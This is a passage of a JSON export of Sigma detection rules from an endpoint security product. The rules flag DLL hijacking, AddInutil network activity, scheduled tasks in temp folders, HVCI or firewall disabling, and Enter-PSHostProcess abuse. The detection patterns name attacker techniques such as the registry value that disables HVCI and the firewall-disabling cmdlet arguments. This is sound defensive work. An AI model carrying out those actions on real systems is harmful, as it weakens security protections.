"rule_description": "Detects potential Windows DLL Hijacking via WSCollect.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "75f3fc65-b2ce-41df-a858-9ba8887a021f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087249Z",
"creation_date": "2026-03-23T11:45:34.087253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html",
"https://lolbas-project.github.io/lolbas/Binaries/Addinutil/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_addinutil_network_connection.yml",
"content": "title: Suspicious AddInutil.exe Network Communication\nid: 75f3fc65-b2ce-41df-a858-9ba8887a021f\ndescription: |\n Detects a suspicious network connection from the Add-In deployment cache updating utility (AddInutil.exe).\n Adversaries can use this utility to proxy the execution of malicious code and make their command and control connections stealthier.\n It is recommended to investigate the target of the network connection, the parent process of AddInutil.exe and other malicious activities on the machine.\nreferences:\n - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\n - https://lolbas-project.github.io/lolbas/Binaries/Addinutil/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/10/27\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.LOLBin.AddInutil\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessOriginalFileName: 'addinutil.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "75f3fc65-b2ce-41df-a858-9ba8887a021f",
"rule_name": "Suspicious AddInutil.exe Network Communication",
"rule_description": "Detects a suspicious network connection from the Add-In deployment cache updating utility (AddInutil.exe).\nAdversaries can use this utility to proxy the execution of malicious code and make their command and control connections stealthier.\nIt is recommended to investigate the target of the network connection, the parent process of AddInutil.exe and other malicious activities on the machine.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1071",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76107997-084f-46ed-aae8-41ca44b17c7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608984Z",
"creation_date": "2026-03-23T11:45:34.608988Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608995Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_temp_scheduled_task.yml",
"content": "title: Scheduled Task Created in Temporary Directory\nid: 76107997-084f-46ed-aae8-41ca44b17c7c\ndescription: |\n Detects a scheduled task created from a temporary directory.\n Adversaries may abuse the Windows Task Scheduler for persistence or privilege escalation.\n It is recommended to investigate the parent process of schtasks to look for malicious content or actions, as well as the target the scheduled task to determine whether it is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/02/08\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n\n selection_command:\n # \"C:\\Windows\\System32\\schtasks.exe\" /create /xml c:\\users\\user\\appdata\\local\\temp\\elevator.xml /tn elevator\n CommandLine|contains|all:\n - '/create '\n - '/tn '\n\n selection_path:\n CommandLine:\n - '*\\AppData\\Local\\Temp\\\\*' # any file extension is possible here\n - '*\\Windows\\Temp\\\\*' # any file extension is possible here\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_samsung:\n ParentCommandLine: '\"?:\\Program Files (x86)\\Samsung\\Settings\\MyLoginLauncher.exe\" /install'\n\n exclusion_teamviewer1:\n # C:\\WINDOWS\\system32\\schtasks /Create /TN TVInstallRestore /TR \"C:\\Users\\SVC-PD~1\\AppData\\Local\\Temp\\TeamViewer\\TeamViewer_.exe /RESTORE\" /RU SYSTEM /SC ONLOGON /F\n ParentImage|endswith:\n - '\\TeamViewer\\TeamViewer_.exe'\n - '\\TeamViewer\\\\*\\TeamViewer_.exe'\n CommandLine|endswith: ' /RU SYSTEM /SC ONLOGON /F'\n\n exclusion_teamviewer2:\n ParentImage: '*\\AppData\\Local\\Temp\\TeamViewer\\update.exe'\n GrandparentImage:\n - '?:\\Program Files\\TeamViewer\\TeamViewer.exe'\n - '?:\\Program Files (x86)\\TeamViewer\\TeamViewer_Service.exe'\n - '?:\\Program Files (x86)\\Teamviewer\\\\*\\TeamViewer_Service.exe'\n\n exclusion_realtek:\n # parent: C:\\Windows\\System32\\DriverStore\\FileRepository\\realtekservice.inf_amd64_e9f6c354061743a4\\RtkAudUService64.exe\n # schtask cmdline : schtasks /create /Tn RtkAudUService64_BG /XML \"C:\\Windows\\TEMP\\ST_CPL.pkg.XML\" /F\n ParentImage:\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\RtkAudUService64.exe'\n - '?:\\Windows\\System32\\RtkAudUService64.exe'\n\n exclusion_atisetup:\n CommandLine|contains|all:\n - 'AMDLinkUpdate'\n - '\\AppData\\Local\\Temp\\\\\\\\AMDLinkDriverUpdate.xml'\n ParentImage: '*\\Driver\\Bin64\\ATISetup.exe'\n GrandparentImage: '*\\Driver\\Setup.exe'\n\n exclusion_lenovo:\n # \"C:\\windows\\system32\\schtasks.exe\" /create /tn \"Lenovo Active Protection System\" /xml \"C:\\windows\\TEMP\\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}\\aps.xml\"\n CommandLine|contains|all:\n - ' /create /tn '\n - 'Lenovo Active Protection System'\n - ' /xml '\n - '\\TEMP\\{????????-????-????-????-????????????}\\aps.xml'\n ParentCommandLine: '?:\\windows\\system32\\msiexec.exe /V'\n GrandparentImage: '?:\\windows\\system32\\services.exe'\n\n exclusion_hp_keyboard:\n # schtasks.exe /Create /TN HP\\HP Collaboration Keyboard\\HP Collaboration Keyboard Controller /XML C:\\Users\\XXX\\AppData\\Local\\Temp\\{C9EECB6F-C41B-4BF5-8203-F7A50B088573}\\HPCollaborationKeyboardTask64bit.xml /F\n CommandLine|contains|all:\n - 'schtasks.exe /Create /TN HP\\HP Collaboration Keyboard\\HP Collaboration Keyboard Controller'\n - 'HPCollaborationKeyboardTask64bit.xml'\n ParentCommandLine: '?:\\windows\\system32\\msiexec.exe /V'\n GrandparentImage: '?:\\windows\\system32\\services.exe'\n\n exclusion_conexant:\n ParentImage:\n - '?:\\program files\\conexant\\install\\audio\\sa3\\x64\\setup64.exe'\n - '?:\\Windows\\Temp\\UIU_IROR_???????????\\x64\\Setup64.exe'\n CommandLine|contains: ' /tn \\microsoft\\windows\\conexant\\sa3' # c:\\windows\\system32\\schtasks.exe /create /xml c:\\windows\\temp\\62469ba22d8.xml /tn \\microsoft\\windows\\conexant\\sa3\n\n exclusion_deployapplication:\n # from here : https://github.com/PSAppDeployToolkit/PSAppDeployToolkit\n\n # c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -executionpolicy bypass -noprofile -nologo -windowstyle hidden -command & { & 'c:\\windows\\ccmcache\\ed\\deploy-application.ps1' -deploymode silent; exit $lastexitcode }\n # c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -executionpolicy bypass -noprofile -nologo -windowstyle hidden -command & { & 'c:\\users\\xxx\\documents\\workplace\\applications\\metrologic-silma-x4-v17-fr-x64-1.0.0-sls\\deploy-application.ps1' -deploymenttype uninstall -deploymode silent; exit $lastexitcode }\n\n ParentCommandLine|contains:\n - '?:\\Windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n # c:\\windows\\system32\\schtasks.exe /create /f /tn siemens_teamcenter_12.4.0_x64_ml_01_blockedapps /xml c:\\windows\\temp\\psappdeploytoolkit\\schtaskunblockapps.xml\n # c:\\windows\\system32\\schtasks.exe /create /f /tn dassaultsystemes_edrawings2019_2019_x64_ml_1.0.0_blockedapps /xml c:\\windows\\temp\\psappdeploytoolkit\\schtaskunblockapps.xml\n # c:\\windows\\system32\\schtasks.exe /create /f /tn autodesk_autocadlt2020_2020_x64_en_01_blockedapps /xml c:\\windows\\temp\\psappdeploytoolkit\\schtaskunblockapps.xml\n CommandLine|contains:\n - '\\psappdeploytoolkit\\schtaskunblockapps.xml'\n - '\\psappdeploytoolkit\\psappdeploytoolkit-executeasuser.xml'\n\n exclusion_deployapplication_powershell_ise:\n # c:\\windows\\system32\\windowspowershell\\v1.0\\powershell_ise.exe\n ParentCommandLine|contains|all: '\\windows\\system32\\windowspowershell\\v1.0\\powershell_ise.exe'\n CommandLine|contains:\n - 'psappdeploytoolkit\\schtaskunblockapps.xml'\n - 'psappdeploytoolkit\\psappdeploytoolkit-executeasuser.xml'\n\n exclusion_wapt:\n GrandparentImage|endswith:\n - '\\wapt\\waptpython.exe'\n - '\\wapt\\wapt-get.exe'\n # schtasks /Create /F /TN fullwaptupgrade /XML c:\\windows\\temp\\tmpteb05q.xml\n # schtasks /Create /RU SYSTEM /SC ONSTART /TN fullwaptupgrade /TR c:\\windows\\temp\\waptdeploy.exe --hash=72dd1bb28863f5e12b1f24b89de4b38c477459e75ceedecfb8bc4fdfa7e97999 --waptsetupurl=c:\\windows\\temp\\waptagent.exe --wait=15 --temporary --force --minversion=1.8.0.6639 /F /V1 /Z\n # schtasks /Create /SC ONCE /TN fullwaptupgrade /TR 'c:\\windows\\temp\\waptdeploy.exe' --hash=04ff657a08c9b967d8b4634690ed7e05bf550287fd93bbf86068bdd0eaf69178 --waptsetupurl=c:\\windows\\temp\\waptagent.exe --wait=15 --temporary --force --minversion=1.8.2.7393 /ST 14:03:57 /RU SYSTEM /F /V1 /Z\n CommandLine|contains:\n - ' /Create /F /TN fullwaptupgrade /XML ?:\\WINDOWS\\TEMP\\tmp*.xml'\n - ' /Create /RU SYSTEM /SC ONSTART /TN fullwaptupgrade /TR ?:\\windows\\temp\\waptdeploy.exe *'\n - ' /Create*fullwaptupgrade*windows\\temp\\waptdeploy.exe*'\n\n exclusion_alienware:\n CommandLine:\n - '?:\\Windows\\system32\\SchTasks.exe /tn \\AWCC\\Update /create /xml ?:\\Windows\\TEMP\\\\*\\AWCCUpdater.xml*'\n - '?:\\Windows\\system32\\SchTasks.exe /tn \\AWCC\\Update /create /xml ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\AWCCUpdater.xml'\n ParentImage:\n - '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n\n exclusion_dell_updater:\n CommandLine: '?:\\Windows\\system32\\SchTasks.exe /tn MyDell.Updater /create /xml ?:\\Windows\\TEMP\\{????????-????-????-????-????????????}\\\\MyDellUpdater.xml'\n ParentImage: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n\n exclusion_amd:\n CommandLine:\n - 'schtasks /Create /TN AMDInstallLauncher /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\AMDAUEPInstaller.xml'\n - 'schtasks /Create /TN AMDScoSupportTypeUpdate /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\AMDScoSupportTypeUpdate.xml'\n - 'schtasks /Create /TN AMDLinkUpdate /XML ?:\\Windows\\TEMP\\\\\\\\AMDLinkDriverUpdate.xml'\n - 'schtasks /Create /TN AMDLinkUpdate /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\AMDLinkDriverUpdate.xml'\n - 'schtasks /Create /TN ModifyLinkUpdate /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\ModifyLinkUpdateNew.xml'\n ParentImage|endswith:\n - '\\Bin64\\AMDSoftwareInstaller.exe'\n - '\\Bin64\\ATISetup.exe'\n - '\\BIN64\\RadeonInstaller.exe'\n\n exclusion_acer:\n ParentImage:\n - '?:\\Program Files (x86)\\Acer\\Acer Jumpstart\\hermes.exe'\n - '?:\\ProgramData\\OEM\\UpgradeTool\\Quick_Access_V_3_0\\UpgradeToolC.exe'\n - '?:\\ProgramData\\OEM\\UpgradeTool\\CareCenter_v4\\UpgradeToolC.exe'\n - '?:\\ProgramData\\OEM\\UpgradeTool\\CareCenter_v4\\\\*FixpackB\\BUnzip\\Setup_msi.exe'\n\n exclusion_heidisql:\n CommandLine: '?:\\Windows\\System32\\schtasks.exe /Create /TN C__*_HeidiSQL_heidisql.exe /xml *\\AppData\\Local\\Temp\\HeidiSQL_task_restart.xml'\n\n exclusion_avira:\n ParentImage: '*\\AppData\\Local\\Temp\\\\*\\avira_spotlight_setup_*.tmp'\n CommandLine|contains:\n - 'schtasks.exe /Create /F /TN Avira_Security_Systray /XML '\n - 'schtasks.exe /Create /F /TN Avira_Security_Maintenance /XML '\n\n exclusion_git:\n CommandLine: 'schtasks /Create /F /TN Git for Windows Updater /XML *\\AppData\\Local\\Temp\\\\*\\auto-updater.xml'\n ParentImage:\n - '*\\AppData\\Local\\Temp\\\\*\\gfw-install-*.tmp'\n - '?:\\Windows\\Temp\\\\*\\git-*.tmp'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of a scheduled task in the user temporary directory by an administrator or 3rd party application.\nlevel: low\n# level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76107997-084f-46ed-aae8-41ca44b17c7c",
"rule_name": "Scheduled Task Created in Temporary Directory",
"rule_description": "Detects a scheduled task created from a temporary directory.\nAdversaries may abuse the Windows Task Scheduler for persistence or privilege escalation.\nIt is recommended to investigate the parent process of schtasks to look for malicious content or actions, as well as the target the scheduled task to determine whether it is legitimate.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "762a46ad-3553-4544-ba6e-8b0d13b449c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621430Z",
"creation_date": "2026-03-23T11:45:34.621432Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621436Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_hvci.yml",
"content": "title: HVCI Driver Blocking Disabled\nid: 762a46ad-3553-4544-ba6e-8b0d13b449c3\ndescription: |\n Detects the HVCI (Hypervisor Enforced Code Integrity) being disabled via registry.\n HVCI is a Windows mechanism that allows blocking of known vulnerable or malicious drivers.\n Once HVCI is disabled, the attacker can proceed to a BYOVD (Bring Your Own Vulnerable Driver) attack.\n It is recommended to investigate the detected process, as well as to look for malicious drivers being loaded after this event.\nreferences:\n - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/\n - https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/06/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "762a46ad-3553-4544-ba6e-8b0d13b449c3",
"rule_name": "HVCI Driver Blocking Disabled",
"rule_description": "Detects the HVCI (Hypervisor Enforced Code Integrity) being disabled via registry.\nHVCI is a Windows mechanism that allows blocking of known vulnerable or malicious drivers.\nOnce HVCI is disabled, the attacker can proceed to a BYOVD (Bring Your Own Vulnerable Driver) attack.\nIt is recommended to investigate the detected process, as well as to look for malicious drivers being loaded after this event.\n",
"rule_creation_date": "2023-06-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7632dbf3-3ad5-4d8a-9ba4-e6a6b78c80fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084692Z",
"creation_date": "2026-03-23T11:45:34.084694Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084698Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/staatsgeheim/status/1868032068892184639",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_enter_pshostsession.yml",
"content": "title: PowerShell Session Hijacked via Enter-PSHostProcess\nid: 7632dbf3-3ad5-4d8a-9ba4-e6a6b78c80fa\ndescription: |\n Detects the execution of the Enter-PSHostProcess cmdlet that allows PowerShell commands to run within the context of a specific process.\n Enter-PSHostProcess is a PowerShell cmdlet that enables administrators to attach to and execute commands within running processes.\n Attackers can abuse this functionality to hijack legitimate processes, execute malicious code with elevated privileges, or blend their activities with normal system processes to evade detection.\n It is recommended to investigate the target process that was accessed, review any PowerShell commands executed within that process context and verify the legitimacy of the user account that initiated the session.\nreferences:\n - https://x.com/staatsgeheim/status/1868032068892184639\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/12/17\nmodified: 2025/06/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ScriptBlockText|contains: 'Enter-PSHostProcess'\n\n exclusion_program_files:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7632dbf3-3ad5-4d8a-9ba4-e6a6b78c80fa",
"rule_name": "PowerShell Session Hijacked via Enter-PSHostProcess",
"rule_description": "Detects the execution of the Enter-PSHostProcess cmdlet that allows PowerShell commands to run within the context of a specific process.\nEnter-PSHostProcess is a PowerShell cmdlet that enables administrators to attach to and execute commands within running processes.\nAttackers can abuse this functionality to hijack legitimate processes, execute malicious code with elevated privileges, or blend their activities with normal system processes to evade detection.\nIt is recommended to investigate the target process that was accessed, review any PowerShell commands executed within that process context and verify the legitimacy of the user account that initiated the session.\n",
"rule_creation_date": "2024-12-17",
"rule_modified_date": "2025-06-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "764f5854-46df-4319-bb1f-77f39a4207ad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080323Z",
"creation_date": "2026-03-23T11:45:34.080325Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
"https://attack.mitre.org/techniques/T1562/004/"
],
"name": "t1562_004_powershell_disable_firewall_script.yml",
"content": "title: Windows Firewall Disabled via PowerShell\nid: 764f5854-46df-4319-bb1f-77f39a4207ad\ndescription: |\n Detects a PowerShell commandlet used to disable the Windows firewall.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n It is recommended to investigate the parent process to determine the legitimacy of this action.\nreferences:\n - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n - https://attack.mitre.org/techniques/T1562/004/\ndate: 2022/05/04\nmodified: 2025/11/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Set-NetFirewallProfile'\n - '-Profile'\n - '-Enabled'\n - 'False'\n\n exclusion_defender:\n - PowershellCommand|contains: 'return (Get-Item \"Function:\\Set-NetFirewallProfile\")'\n - PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1'\n - ProcessCommandLine|contains: 'Get-FileHash ??:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1? -Algorithm SHA256;'\n\n exclusion_cyberwatch:\n ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_cockpit:\n ProcessImage: '?:\\Program Files (x86)\\Philips Healthcare\\Cockpit\\SysCheck.UI.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Windows\\CCM\\TSMBootstrap.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "764f5854-46df-4319-bb1f-77f39a4207ad",
"rule_name": "Windows Firewall Disabled via PowerShell",
"rule_description": "Detects a PowerShell commandlet used to disable the Windows firewall.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nIt is recommended to investigate the parent process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-05-04",
"rule_modified_date": "2025-11-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76529836-bb7a-4a8e-8d1e-611c2d932858",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072443Z",
"creation_date": "2026-03-23T11:45:34.072445Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072449Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
